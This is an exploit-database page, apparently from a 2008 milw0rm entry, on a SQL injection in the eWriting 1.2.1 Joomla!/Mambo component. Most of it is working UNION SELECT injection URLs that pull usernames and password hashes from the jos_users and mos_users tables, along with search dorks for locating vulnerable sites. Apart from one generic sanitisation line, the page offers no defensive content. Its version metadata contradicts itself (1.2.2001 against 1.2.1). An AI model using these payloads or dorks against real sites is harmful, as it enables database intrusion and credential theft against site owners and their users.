header-logo
Suggest Exploit
vendor:
eWriting
by:
breaker_unit & Don
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: eWriting
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:ewriting:ewriting:1.2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla! and Mambo
2008

eWriting 1.2.1 – SQL injection

eWriting 1.2.1 is vulnerable to SQL injection. Attackers can exploit this vulnerability to gain access to sensitive information such as usernames and passwords. The vulnerable parameter is ‘cat’ in the ‘func=selectcat’ parameter. An attacker can inject malicious SQL code into the ‘cat’ parameter to gain access to the database. For Joomla!, the malicious SQL code is ‘-1 UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10 FROM jos_users--’ and for Mambo, the malicious SQL code is ‘-1 UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10 FROM mos_users--’. Dorks used to identify vulnerable websites are ‘Powered by eWriting 1.2.1’ and ‘allinurl:”com_ewriting”’.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don

# BHack

# b4lc4n.org

# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]